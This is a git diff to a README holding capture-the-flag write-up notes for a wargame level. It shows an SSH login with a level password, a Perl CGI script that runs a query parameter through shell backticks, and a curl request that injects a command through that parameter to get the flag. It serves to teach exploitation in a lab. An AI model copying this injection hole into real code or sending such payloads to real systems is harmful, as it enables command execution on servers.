diff --git a/README.mdx b/README.mdx
index 3008c9c..9d2ded3 100644
--- a/README.mdx
+++ b/README.mdx
@@ -282,22 +282,47 @@ getflag: /bin/getflag
 ```
-# 04 - Todo: perl script problem
-- understand the `.pl`
-- know `2>&1`
+# 04
+
+Login
+
 ```b
-> nc -vz localhost 4747
- 👆 v: verbose - z: scan if a port is open
-Connection to localhost 4747 port [tcp/*] succeeded!
+> ssh level04@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242
+> Password: qi0maab88jeaj46qoumi7maus
+```
-> curl localhost:4747/?x="\`/bin/getflag\`"
+We have a script and maybe it interacts w/ a webpage:
+
+```pl
+#!/usr/bin/perl
+# localhost:4747
+use CGI qw{param};
+ # CGI (Common Gateway Interface)
+ # param: a CGI module func fetches params from HTTP requests
+ # qw: quote words
+print "Content-type: text/html\n\n";
+sub x {
+ $y = $_[0];
+ print `echo $y 2>&1`;
+ # sub -- define subroutine x
+ # $_[0] -- subroutine `x()` takes a single arg`
+ # print w/ backticks invokes a shell command
+ # 2>&1 -- combine stdout and stderr, & means 1 is a fd not a filename
+}
+x(param("x"));
+ # 1st `x` : calling the subroutine
+ # 2nd `x` : a query param
+ # x comes in form of "...?x=getflag"
 ```
-- token
+Solution
 ```b
-su level05
-> Password: ne2searoevaevoem4ov4ar8ap
+> nc -vz localhost 4747
+ ^ v: verbose, z: scan if a port is open (scanning listening daemons)
+Connection to localhost 4747 port [tcp/*] succeeded!
+
+> curl localhost:4747/?x="\`/bin/getflag\`"
 ```